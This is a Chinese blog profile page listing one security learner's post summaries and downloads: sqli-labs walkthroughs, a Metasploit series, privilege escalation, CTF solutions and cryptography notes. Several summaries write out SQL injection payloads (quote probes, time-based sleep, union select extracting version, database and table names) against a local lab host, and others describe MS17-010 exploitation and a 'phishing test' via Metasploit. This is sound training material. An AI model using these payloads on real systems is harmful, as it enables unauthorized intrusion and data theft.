自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

bronze_s的博客

  • 博客(46)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 php反序列化--2--PHP反序列化漏洞基础知识

反序列化是将序列化的字符串还原为PHP的值的过程。

2024-07-14 16:56:04 418

原创 php反序列化--1--PHP序列化

不同数据类型序列化的结果

2024-07-12 10:54:05 912

原创 常见文件头及文件尾+常见的content-type

Content-Type(MediaType),即是Internet Media Type,互联网媒体类型,也叫做MIME类型。在互联网中有成百上千中不同的数据类型,HTTP在传输数据对象时会为他们打上称为MIME的数据格式标签,用于区分数据类型。最初MIME是用于电子邮件系统的,后来HTTP也采用了这一方案。在HTTP协议消息头中,使用Content-Type来表示请求和响应中的媒体类型信息。

2024-06-06 11:03:34 783

原创 网络攻击与防御措施及防御产品

分析了攻击类型、并列出了对不同的攻击方法的防御措施,和可以使用的安全设备。

2023-06-28 10:46:01 168

原创 第一章 计算机系统的概述①

操作系统 (Operating System, 0s) 是指整个计算机系统的;它是计算机系统中最基本的。

2023-06-26 11:22:07 483

原创 密码基础知识(3)---对称密码体制

对称密码详解

2023-04-26 10:16:39 4439

原创 密码基础知识(2)---知识点总结

密码学基本概念

2023-03-17 17:44:42 842

原创 密码基础知识(1)---密码学发展史

密码学国内外发展史

2023-03-14 14:32:06 1929

原创 安装novnc,并加入开机自启

1.安装git工具apt-get install git -y2.下载novncgit clone https://github.com/novnc/noVNC3.ls 查看,已经下载完成4.vim novnc.sh把启动命令写到sh文件。5.给novnc.sh加权限chmod 755 novnc.sh6.把novnc.sh 文件加入自启动重启novnc已经可以自启动。...

2022-04-22 17:46:14 2090

原创 取消vnc身份验证或设置短密码或空密码的方法

在使用vnc时都需要输入密码在输入vncserver时都需要输入密码,而且要求密码必须为6位以上。1.设置短密码,或空密码vncpasswd -f > ~/.vnc/passwd没有任何提示,你需要输入一次你的新密码并回车(要设置空密码就直接回车)还是没有任何提示,再输入一遍密码并回车再使用vnc viewer连接时,就算你设置的是空密码,还是有认证弹窗,直接点“ok”连接。2.取消身份验证框在/root/.vnc目录下(可能在不同的路径,但是都在.vnc目录下,可以f

2022-04-22 15:22:11 11522 1

原创 CTF-base16解密

666C61677B65633862326565302D336165392D346332312D613031322D3038616135666137626536377D

2022-04-06 22:52:58 1485

原创 CTF-Vigenere

题目内容:二战的鹰酱截获了敌军发送的密报,但是关于如何破解却无从下手。经过密码学专家分析,这是“不可破译的密码”。但那已经是上个世纪的事了,现在,我相信你肯定有办法。flag提交前添加flag{}cvnwvk lqae bw wzgy czxrxlm gnaoiiaafy. am ara xaufwiu qf fwg mlfckmnv tru aajtwxr pmsd afw rfe zms ehvv bzmn lpiebq yeeuiia. zq hsl qrvq keskw fn jqswtv

2022-04-06 22:37:52 4588

原创 sql-libs——less8

http://192.168.31.164:9002/Less-8/?id=1'加'不再显示“you are in”http://192.168.31.164:9002/Less-8/?id=1'--+加'--+显示正常http://192.168.31.164:9002/Less-8/?id=1' and sleep(5)--+加入and sleep(5)发现延迟5s说明存在SQL注入漏洞http://192.168.31.164:9002/Less-8/?id=1' and if

2021-10-25 21:38:54 262

原创 sql-libs——less6

首先打开页面,输入? id=1,发现没有任何数据爆出http://192.168.31.164:9002/Less-6/?id=-1'试一下,未发现报错。http://192.168.31.164:9002/Less-6/?id=1'"试一下,发现报错,说明存在sql注入。后续步骤同less-5

2021-10-17 21:36:31 98

原创 sql-libs——less5(盲注)

首先打开页面,输入? id=1,发现没有任何数据爆出这时把ID换成一个不存在数据-1试一下,发现连 you are in …都没有了,这就是典型的盲注,正确时显示you are in …,不正确时什么也不显示。http://192.168.0.5:9002/Less-5/?id=-1加'试一下,发现报错,说明存在SQL注入漏洞。http://192.168.0.5:9002/Less-5/?id=-1'首先我们使用length()函数获取数据库名字的长度这里呢等于7没有返回任何信息,证明数

2021-10-16 22:12:03 505

原创 mysql中information_schema数据库在SQL注入中的应用详解

mysql5.0以上和mysql5.0以下的区别5.0以下没有information_schema这个数据库,无法列表名等,只能暴力跑表名。5.0以下是多用户单操作,5.0以上是多用户多操做。

2021-10-16 21:24:42 338

原创 sql-libs——less4

带入ID参数加'不报错加"报错,根据报错信息看是通过)进行闭合的使用")进行闭合后会发现返回正常剩余步骤同less3

2021-10-12 14:55:32 112

原创 sql-libs——less3

http://192.168.0.5:9002/Less-3/?id=5%27)%20order%20by%203%20–+http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,2,3%20–+http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,version(),database()%20–+http://192.168.0.5:9002/Less-

2021-10-12 14:37:48 156

原创 sql-libs——less2

带入执行的SQL语句$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";判断列数http://192.168.0.5:9002/Less-2/?id=1 order by 3http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3爆表名http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_na

2021-10-11 16:04:45 1426

原创 sql-libs——less1

打开第一关发现没有任何参数,根据提示“请输入ID作为带有数字值的参数”构造url,正常显示。加’ 判断有无注入,执行后报错,可判断为数字型注入...

2021-10-11 15:28:35 393

原创 Metasploit系列----数据库相关操作

在metasploit framework msfconsole 中通过postgresql数据库完成数据的存储与操作数据库初始化数据库初始化:systemctl start postgresql.service查看数据库状态:systemctl status postgresql.service或数据库初始化:msfdb init数据库重新初始化:msfdb reinit删除数据库:msfdb delete数据库启动:msfdb start停止数据库: msfdb stop查看数据库状

2021-06-13 21:46:07 661 1

原创 Metasploit系列----nmap结果导入msf

环境攻击机器:kali linux:192.168.1.7靶机:windows10:192.168.1.6在kali中使用nmap对windows进行扫描nmap -A -v -T4 192.168.1.6 -oX scan.xml 将扫描结果保存在scan.xml中扫描结束后,使用ls查看,已经生成scan.xml文件使用cat scan.xml 查看文件,里边是扫描结果信息。将scan.xml 导入msf在命令终端使用命令 msfconsole 打开msf使用db_import 文件

2021-06-13 21:04:25 617

原创 Metasploit系列----未知目标测试

攻击机器:kali 192.168.1.8目标机器:windows2003 192.168.1.7操作步骤创建工作空间显示数据库未连接使用msfdb init对数据进行初始化使用命令db_status查看数据库状态信息,显示数据库已连接。使用命令workspace -a 192.168.1.7创建目标工作空间。信息搜集测试目标连通性:ping 192.168.1.7(ping -c 3 ip :ping三次后结束 和 ping 使用ctrl+c结束)测试目标服务:在msf中使

2021-05-08 10:48:11 426 1

原创 Metasploit系列----基础命令

use : 指定设置的模块show: 显示可用的模块或选项set: 设定选项或模块run | exploit : 启动模块back: 取消当前指定模块,并返回上级窗口info: 查看模块信息search: 搜索符合条件的模块cheak: 检查制定目标是否存在可用漏洞,并能被exploit利用session: 列举当前可用会话使用meterpreter作为payload时,会获得metereprter会话。常用命令sysinfo: 列举被渗透主机的系统信息。ifconfig: 列.

2021-04-25 23:24:00 161

原创 Metasploit系列----首次使用报错未连接数据库

开启postgresql服务 systemctl start postgresql.service初始化数据库:msfdb init

2021-04-25 22:55:47 115

原创 Metasploit系列----模块详解

kali linux中默认集成了metasploit Framework社区版本,是精简后的免费版本。使用者多为安全研究人员或学生。metasploit中的模块分类exploit(渗透模块): 是一段程序,运行时会利用目标的安全漏洞进行安全测试。payload(安全测试载荷模块): 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。auxiliary(辅助模块): 包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。encoder(编码器模

2021-04-25 22:52:38 1386

原创 Metasploit系列----kage可视化

Kage环境搭建下载链接:https://github.com/Zerx0r/Kage/releases在linux中安装选择第一个:使用 ./Kage.0.1.1-beta_linux.AppImage运行Kage打开可视化界面。点击按钮自动启动数据,生成用户名密码使用kage对windows系统进行测试目标机器:windows2003攻击机器:kali linux点击生成payload,会给出kage.exe的路径在kage路径下使用python -m SimpleHTTPS

2021-04-23 14:02:54 827 1

原创 Metasploit系列----钓鱼测试

测试环境攻击环境:kali目标靶机:windows2003(192.168.1.8)钓鱼测试(使用漏洞ms13_017_teme)当用户运行对应文件时漏洞被利用search ms13_017_teme 查询漏洞利用模块use 路径 进入模块 run 执行漏洞利用代码会生成一个路径,在目标机器命令行中执行目标机器中将会启动监听程序使用sessions查看当前会话使用 sessions -1 2 链接会话执行一些查看命令发现钓鱼成功,该信息为目标机器的信息注:若提示4444端口被

2021-04-18 18:29:11 307

原创 Metasploit系列----系统测试

测试环境攻击环境:kali目标靶机:windows2003(192.168.1.8)系统测试(测试漏洞ms17-041)在kali中使用msfconsole启动msf程序search ms17-010 搜索可以使用的模块使用 use auxiliary/admin/smb/ms17_010_command进入该模块使用set rhosts 192.168.1.8设置目标IP使用 run 进行检测,看到系统存在ma17-010漏洞使用 use exploit/windows/smb/ms1

2021-04-18 17:58:04 82

原创 Metasploit系列----Metasploit基础

metasploit:MSF是由ruby编写,采用模块化的方法完成渗透测试。是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。优点:易拓展目前支持的页面类型:msfconsolearmitage数据库设置:在kali中输入命令:开启数据库:systemctl start postgresql查看数据库是否开启: systemctl status postgresql显示active表示开启状态:或使用命令msfconsole打开msf框架

2021-04-10 00:53:03 368

原创 CTF-view_source

解题查看题目:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。打开题目:提示flag不在这里根据题目提示,flag应该在源代码中,右击查看源代码,发现右击不能使用。使用F12或在url前添加view-source:查看发现flag拓展view-source是一种协议,早期基本上每个浏览器都支持这个协议。后来Microsoft考虑安全性,对于WindowsXP pack2以及更高版本以后IE就不再支持此协议。但是这个方法在FireFox..

2021-03-07 14:27:23 686

原创 wireshark-2-伯克利包过滤

伯克利包过滤(Berkeley Packet Filter, BPF)名称功能常见类型type这种限定符表示指代的对象,例如 IP 地址、子网或者端口等。host:表示主机名和IP地址 net:用来表示子网 port:用来表示端口dir表示数据包传输的方向src:源地址 dst:目的地址proto表示与数据包匹配的协议类型arp、http、dns关系符符号用途...

2021-02-24 09:32:13 409

原创 关于wireshark在win10安装查找不到接口解决办法

在win10中下载安装了一个wireshark,但是启动后找不到接口,亲测有用。原因:由于其自带的Winpcap不支持Win10在http://www.win10pcap.org/download/中下载一个WIN10的wincap安装重启wireshark接口已找到。

2021-02-20 10:35:02 229

原创 wireshark-1-wireshark介绍

功能网络流量的捕获和分析软件历史ethereal是wireshark的前身,在2006年更名为wireshark原理捕获硬件上的二进制流量转换wireshark组装数据包分析捕获的数据包,识别协议信息等优势开源免费跨平台可视化功能强大下载安装官方网站:https://www.wireshark.org/#download选择所需要的版本,也可以下载源代码进行开发。下载完成后直接点击下一步下一步完成安装。...

2021-02-20 10:25:12 299

原创 Linux提权-依赖exp篇

最近拜读了一下大佬的博客,果然都是精华,只是个人解释,若有错误之处,非常感谢各位提出。大神的github链接:https://github.com/Micropoor/Micro8漏洞名称 漏洞存在位置 涉及的版本CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch]CVE-2017-7494 [Samba

2021-02-05 09:12:56 478

原创 windows提权-快速查找exp

最近拜读了一下大佬的博客,果然都是精华,只是个人解释,若有错误之处,非常感谢各位提出。大神的github链接:https://github.com/Micropoor/Micro8什么时候要进行windows提权?通过其他方式获得了windows的权限,但获得的权限较低。这时需要通过提权获得更高的权限。windows的权限都有哪些?内置用户:Administrator:系统管理员用户,拥有完全控制权。Guest:来宾账户,供访问共享资源的网络用户使用,仅具有最基本的权限,默认被禁用。内置用户

2021-02-04 14:50:45 989 1

原创 同源策略及跨域请求

同源策略(Same origin policy)同源策略是一种约定,他是浏览器最核心也是最基本的安全功能,同源是指域名、协议、端口需要保持一致才能进行相互间的访问。浏览器采用同源策略,禁止页面加载或执行来源不同域的任何脚本。换句话说浏览器禁止的是来自不同源的“document”或脚本,对当前读取的“document”读取或设置某些属性。不受同源限制的标签:<script>、<img>、<ifrom>、<link>这些包含src属性的标签可以加载跨域资源

2021-01-26 16:03:27 113

原创 WEB数据安全及会话跟踪

web加密处理:HTTPS加密传输:https在传输过程中是可以通过加密来保护数据安全的,以免用户名敏感信息被第三方获取。可以说https是http的升级版、安全版,即:https=http+ssl客服端发起https请求,连接到服务端的443端口(https协议默认的端口)服务段提供证书公钥和私钥返回证书的公钥客户端解析证书:判断证书是否有效、生成随机值、公钥加密随机数将加密后的随机数发送给服务端服务端使用私钥进行解密,得到随机数服务端将加密的内容发回客户端客户端根据本地存储的随机数

2021-01-26 15:11:37 149

原创 主流的web前端开发及调试工具

web前端开发工具(开发工具众多,只举例常用的。)Visual Studio Code:界面美观插件安全界面操作方便Sublime text :是主流的开发编辑器,小巧轻便启动速度快(媲美记事本)丰富的可扩展插件内置语言的高亮内置语言的自动补全Webstorm:是jetbrains公司旗下的一款javascript开发工具被誉为“最智能的javascript IDE”对目前主流的web前端框架进行了集成,安装方便代码补全框架丰富强大的集成代码的格式化hbuild

2021-01-25 16:50:12 3023

原创 神奇的磁带

打开实验环境审题这是一个web题,打开指导书目标为10.1.1.147:5001,使用浏览器打开这个地址,可以看到一个web页面。右键查看源代码,可以看到最后一行存在一个flag.txt文件

2020-08-18 16:26:24 882

pycharm俄罗斯方块
python有趣的库pycharm

2024-06-27

美赛6种题型及通关详解.rar
美赛6种题型及通关详解

2024-06-27

2016蓝桥杯c-c++省赛试题及答案解析.rar
2016蓝桥杯c-c++省赛试题及答案解析

2024-06-27

2017年全国大学生电子设计竞赛-微电网模拟系统(A题).rar
2017年全国大学生电子设计竞赛---微电网模拟系统(A题).rar

2024-06-27

全国大学生智能汽车竞赛技术报告
全国大学生智能汽车竞赛技术报告

2024-06-27

大学生创业计划书(通用5篇)
大学生创业计划书(通用5篇)

2024-06-27

Matlab 神经网络模型
人工神经网络是在现代神经科学的基础上提出和发展起来的,旨在反映人脑结构及 功能的一种抽象数学模型。自 1943 年美国心理学家 W. McCulloch 和数学家 W. Pitts 提 出形式神经元的抽象数学模型—MP 模型以来,人工神经网络理论技术经过了 50 多年 曲折的发展。特别是 20 世纪 80 年代,人工神经网络的研究取得了重大进展,有关的理 论和方法已经发展成一门界于物理学、数学、计算机科学和神经生物学之间的交叉学科。 它在模式识别,图像处理,智能控制,组合优化,金融预测与管理,通信,机器人以及 专家系统等领域得到广泛的应用,提出了 40 多种神经网络模型,其中比较著名的有感 知机,Hopfield 网络,Boltzman 机,自适应共振理论及反向传播网络(BP)等。在这 里我们仅讨论最基本的网络模型及其学习算法。

2024-06-27

python编写的简单的猜数字游戏
python有趣的库 在 Python 中,random 是一个内置模块,用于生成随机数或进行随机选择。

2024-06-27

太阳系模拟程序(基于turtle)
python有趣的库turtle 是 Python 的一个标准库,它提供了一个简单的绘图工具,用于绘制图形和图像。turtle 模块基于 Logo 编程语言中的绘图功能,允许用户通过编程来控制一个虚拟的“海龟”(turtle)在屏幕上移动,从而绘制出各种形状和图案。 以下是 turtle 模块的一些主要特点和功能: 易于学习:turtle 模块非常适合初学者学习编程和图形绘制。通过简单的命令,用户可以控制海龟的移动、转向、绘制线条等。 可视化编程:使用 turtle 模块,用户可以直接看到编程结果,这对于理解编程逻辑和调试程序非常有帮助。 丰富的绘图功能:turtle 模块提供了多种绘图功能,包括绘制线条、圆形、多边形等。用户还可以设置画笔的颜色、粗细、填充颜色等属性。 事件处理:turtle 模块支持键盘和鼠标事件处理,用户可以通过编程来响应这些事件,实现更复杂的交互功能。 扩展性:虽然 turtle 模块本身提供了丰富的绘图功能,但用户还可以结合其他 Python 库(如 math、random 等)来扩展其功能,实现更复杂的图形绘制和动画效果。 跨平台:turtl

2024-06-27

支持向量分类机的基本原理、支持向量回归机
支持向量机是数据挖掘中的一项新技术,是借助于最优化方法来解决机器学习问题的新工具,最初由 V.Vapnik 等人提出,近几年来在其理论研究和算法实现等方面都取得了很大的进展,开始成为克服“维数灾难”和过学习等困难的强有力的手段,它的理论基础和实现途径的基本框架都已形成。

2024-06-27

Matlab与C-混合编程.rar
Matlab与C#混合编程的实现 关于matlab与c#之间一些数据类型的转换的方法

2024-06-27

Matlab GUI 编程.rar
MATLAB论坛关整理

2024-06-27

数学建模模板/数学建模模板
摘抄: 首先简要叙述所给问题的意义和要求,并分别分析每个小问题的特点(以下以三个问题为例)。根据这些特点我们对问题1用……的方法解决;对问题2用......的方法解决;对问题3用……的方法解决。 对于问题1我们用......数学中的......首先建立了......模型I。在对......模型改进的基础上建立了......。模型II。对模型进行了合理的理论证明和推导,所给出的理论证明结果大约为......。,然后借助于......数学算法和......软件,对附件中所提供的数据进行了筛选,去除异常数据,对残缺数据进行适当补充,并从中随机抽取了3组数据(每组8个采样)对理论结果进行了数据模拟,结果显示,理论结果与数据模拟结果吻合。(方法、软件、结果都必须清晰描述,可以独立成段,不建议使用表格)

2024-06-27

Simulink建模仿真实例详解
首先介绍计算机仿真技术和仿真建模方法的基本概念,以 便对建模和仿真有个初步和整体的认识;然后对 Simulink 进 行简单介绍,并以一个简单例子进行引导;最后介绍 Simulink 的工作原理,为后续的深入掌握 Simulink 打下基础。

2024-06-27

MATLAB科学计算器设计
目录 计算器的效果图 2 第一章 GUI设计界面 3 1.1打开GUI 3 1.2.添加按钮 3 1.3.根据按钮的作用及视觉效果做一定的修改 4 1.4.保存、添加功能函数 4 1.4.1 数字键编写 4 1.4.2 符号键的编写 4 1.4.3 运算符“=”的编写 5 1.4.4 按键“←back”的编写 5 1.4.5 按键“清空”的编写 5 1.4.6 按键“退出”的编写 5 1.4.7 按键“二进制数转十进制数”的编写 5 1.4.8 按键“十进制数转二进制数”的编写 5 第二章 计算器的使用 6 2.1 除法运算(÷) 6 2.2 平方运算(^2) 6 2.3 函数cos (∏/3) 的计算 7 2.4 函数arctan (∏/3) 的计算 7 2.5 以2为底的对数(log 2)的计算 8 2.6 十进制数转二进制数的计算 8 2.7 二进制数转十进制数的计算 9 第三章 各按键的程序源代码 10 第四章 问题和解决方法 15 第五章 心得体会 16 参考文献 17

2024-06-27

python爬取北、上、广租房信息(高分课程设计)
python爬取北、上、广租房信息(高分课程设计) python3+以上环境

2024-06-27

使用OpenCV-Python批量为照片应用写生素描滤镜(高分课后作业)
使用OpenCV-Python批量为照片应用写生素描滤镜

2024-06-27

自动化的SQL注入和数据库接管工具使用说明
SQLmap是一个功能强大的自动化SQL注入工具,主要用于扫描、发现并利用给定的URL中的SQL注入漏洞。以下是关于SQLmap工具的使用简介: 一、主要功能 1. 扫描、发现并利用SQL注入漏洞:SQLmap能够自动化地检测目标URL是否存在SQL注入漏洞,并尝试利用这些漏洞获取数据库服务器的权限。 2. 数据库指纹识别:SQLmap能够识别目标数据库的类型和版本,支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL等。 3. 数据库枚举:支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列等信息。 4. 数据提取:支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列。 5. 访问目标文件系统:当数据库管理系统是MySQL、PostgreSQL或MSSQL时,支持下载或上传文件。 6. 执行任意命令:当获取到完全的操作权限时,支持在数据库管理系统中执行任意命令并回显标准输出。 二、支持的注入方式 SQLmap全面支持六种SQL注入技术,包括: 1. 基于布尔类型的盲注:根据返回页面判断条件真假的注入。 2. 基于时间的盲注:通过查看时间延迟语句是否

2024-06-26

python编写的批量下载图片的爬虫
python编写的批量下载图片的爬虫

2024-06-26

2022世界机器人大赛章程
2022世界机器人大赛章程

2024-06-26

云商城前端-微信小程序
云上城作为一个综合性的项目或平台,其前端部分主要负责与用户进行交互,提供直观、友好的界面体验。 前端设计旨在确保用户能够轻松、快速地访问和使用云上城提供的各项功能和服务。

2024-06-26

40个单边机汇编实验指导书
包含实验任务 电路原理图 程序设计内容 程序框图 汇编源程序

2024-06-26

python时钟(高分课后作业)
使用Python编程语言来模拟或实现时钟功能的应用或项目

2024-06-26

PHP文件包含之利用phpinfo
当遇到PHP文件包含漏洞,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来getshell。因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名,进而进行包含。

2024-06-26

JavaScript 5.5语言参考
这些方便实用的信息将帮助您了解 JScript 的各个部分。 在“字母顺序的关键字列表”中,可以找到按字母顺序列出的所有 JScript 语言的主题。如果只需要查看某个主题(例如对象),则有对该主题进行详细说明的章节可供查阅。 如何操作呢?单击左边任意一个标题,即可显示该标题所包含的项目列表。再从该列表中选择要查看的主题。在打开所选主题后,就可以方便地链接到相关章节。 请尽情浏览 JScript 语言参考的各个部分,你会发现 JScript 语言有多么丰富。

2024-06-26

turtle 赛跑(有趣的python课后作业)
Python的turtle模块是一个流行的绘图库,它提供了一个简单的绘图界面,你可以使用它来绘制各种图形。turtle模块的名称来源于在屏幕上移动并绘制线条的“海龟”光标。

2024-06-26

python语言+turtle库绘制蜘蛛网(课后作业)
Python的turtle模块是一个流行的绘图库,它提供了一个简单的绘图界面,你可以使用它来绘制各种图形。turtle模块的名称来源于在屏幕上移动并绘制线条的“海龟”光标。

2024-06-26

python海龟画图-小黄人(高分课后作业)
Python的turtle模块是一个流行的绘图库,它提供了一个简单的绘图界面,你可以使用它来绘制各种图形。turtle模块的名称来源于在屏幕上移动并绘制线条的“海龟”光标。

2024-06-26

基于matlab的数字图像分割技术研究及实现(本科毕业论文设计)
本文通过对图像分割技术的深入研究,对图像分割的研究现状和国内外研究动态进行了跟踪,针对目前常用的图像分割技术如:阈值分割方法,边缘检测方法,边界法和区域法等作了总结。在matlab环境下用这些方法对一些具有不同特点的图像进行分割处理,并取得了比较满意的效果,为图像处理的进一步进行奠定了基础。最后对图像分割技术的研究前景和应用前景作了展望和预见。 关键词:图像分割,直方图,matlab实现

2024-06-26

基于python的图书管理系统(高分课程设计作业)
基于python的图书管理系统(高分课程设计作业)

2024-06-26

ARM汇编- ARM 架构,过去称作高级精简指令集机器
ARM汇编语言是针对ARM架构设计的低级编程语言,用于直接操作硬件和编写高效的系统级程序。它广泛应用于通信、消费电子、成像设备、海量存储、汽车电子、工业控制和网络应用等领域,为这些产品提供可运行复杂操作系统的开放应用平台或实时嵌入式应用。

2024-06-26

软件逆向工具-硬件断点与条件断点(实验指导书)
硬件断点和DRx调试寄存器有关。从Inter CPU体系架构手册中,可以找到DRx调试寄存器的介绍。 DRx调试寄存器总共有8个,从DRx0到DRx7。每个寄存器的特性如下: ·DR0~DR3:调试地址寄存器,保存需要监视的地址,如设置硬件断点; ·DR4~DR5:保留,未公开具体作用; ·DR6:调试寄存器组状态寄存器; ·DR7:调试寄存器组控制寄存器。 硬件断点原理是使用4个调试寄存器(DR0,DR1,DR2,DR3)来设定地址,以及DR7设定状态,比如:对这个401000是硬件读还是写,或者是执行;是对字节还是对字,或者是双字。因此最多只能设置4个断点。

2024-06-26

软件安全开发框架.rar
有很多 SDLC 方法,包括瀑布、螺旋、敏捷和 DevOps。但是很少有模型明确地处理软件安全问题,因此软件安全开发实践被添加和集成到 SDLC 方法中。 不管是什么 SDLC 方法,应当把软件安全开发实践在整个过程中进行集成,目的有三个:一是减少发布软件的漏洞数量;二是缓解未检出或 未处置漏洞被利用时的影响;三是找出安全漏洞产生的根本原因加以处置以避免再生。有很多安全方面的考虑可以在 SDLC 的多个阶段实施,但是 一般情况下,越早处置安全问题,达到相同的安全水平所需的努力和成本就越低。这个原则被称为“左移(shifting left)”,它非常重要,且 无关于所采用的 SDLC 方法。 SSDF 白皮书没有引入新的实践或定义新的术语,相反,它基于现有的标准、指南和软件安全开发实践文档,描述了一个高级别实践的集合。 该白皮书只是作为讨论 SSDF 概念的起点,因此它没有提供一个关于 SSDF 的完整视图。

2024-06-26

docker-常用命令
Docker是一个开源的应用容器引擎,它允许开发者将应用程序及其依赖项打包到一个可移植的容器中,并发布到任何Linux机器上

2024-06-26

Wireshark抓取http数据包并分析获明文密码+实验指导书+抓取的数据包
当我们输入账号、密码登录一个网站时,如果网站允许你使用HTTP(明文)进行身份验证,那么此时捕获通信流量非常简单,我们完全可以对捕获到的流量进行分析以获取登录账号和密码。这种方法不仅适用于局域网,甚至还适用于互联网。这就意味着,攻击者将可以破解任何使用HTTP协议进行身份验证的网站密码。在局域网内要做到这一点很容易,这不禁使你惊讶HTTP是有多么的不安全。你可以在宿舍网络、工作网络,甚至是校园网络尝试这种破解方法,不过校园网络需要允许广播流量功能,并且要求你的局域网网卡可以设置为混杂模式。

2024-06-26

python画玫瑰(基于turtle)
在Python中,turtle模块是一个流行的绘图库,它允许用户通过编程来绘制图形和图像。使用turtle模块,你可以通过控制一个虚拟的“海龟”来绘制各种形状和图案,包括玫瑰。

2024-06-26

python语言+PyQt5实现日历(高分课程设计)
PyQt5是一个用于创建图形用户界面(GUI)的Python库,它基于Qt 5这一强大的C库。PyQt5为Python开发者提供了一个强大的工具,用于创建专业的GUI应用程序,而无需深入了解底层的C编程 使用PyQt5实现日历(高分课程设计)

2024-06-26

用python编写的二分法查找排序
二分法查找(也称为二分查找、折半查找)是一种在有序数组中查找某一特定元素的搜索算法。但是,二分法查找并不涉及排序,它假设输入数组已经是有序的。

2024-06-26

java题库-期末考试
Java题库是一个为Java学习者提供全面、系统、层次丰富的编程题目集合。这个题库旨在帮助Java学习者深入理解和掌握Java编程知识,提高编程技能,为进一步的学习和应用打下坚实的基础。以下是关于Java题库的详细介绍: 一、题库内容 Java题库包含了从基础语法、面向对象编程、异常处理、集合框架、IO流、多线程等各个方面的知识点。每个知识点下又细分为多个子主题,如基础语法中的变量和数据类型、运算符和表达式、条件控制和循环结构等。每个子主题下又包含了多个不同难度级别的题目,以满足不同学习者的需求。

2024-06-25

计算机等级考试二级经典C语言程序100例
计算机等级考试二级经典C语言程序题库是专为准备全国计算机等级考试二级C语言科目的考生所设计的。这个题库包含了大量的编程题目和实例,旨在帮助考生深入理解C语言的基本语法、数据结构、算法以及编程思想。以下是对该题库的简要介绍: 一、题库内容概览 基础知识: C语言的基本语法,包括数据类型、运算符、控制结构(顺序、选择、循环)等。 预处理指令、函数、数组、指针等高级概念。 编程实践: 提供了大量的编程题目,覆盖从基础到进阶的各种难度级别。 题目类型包括编程题、函数编写、算法实现等。 考点解析: 针对每个考点,提供了详细的解析和示例代码,帮助考生深入理解。 强调了考试中的常见错误和易错点,帮助考生避免在考试中犯类似错误。 二、题库特点 全面性: 题库内容涵盖了C语言的所有重要知识点,确保考生能够全面复习。 题目难度从简单到复杂,适合不同水平的考生进行练习。 实用性: 题目紧密结合实际编程需求,帮助考生提高编程能力和解决实际问题的能力。 提供了详细的解析和示例代码,方便考生自学和复习。 针对性: 针对全国计算机等级考试二级C语言科目的考试大纲

2024-06-25

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除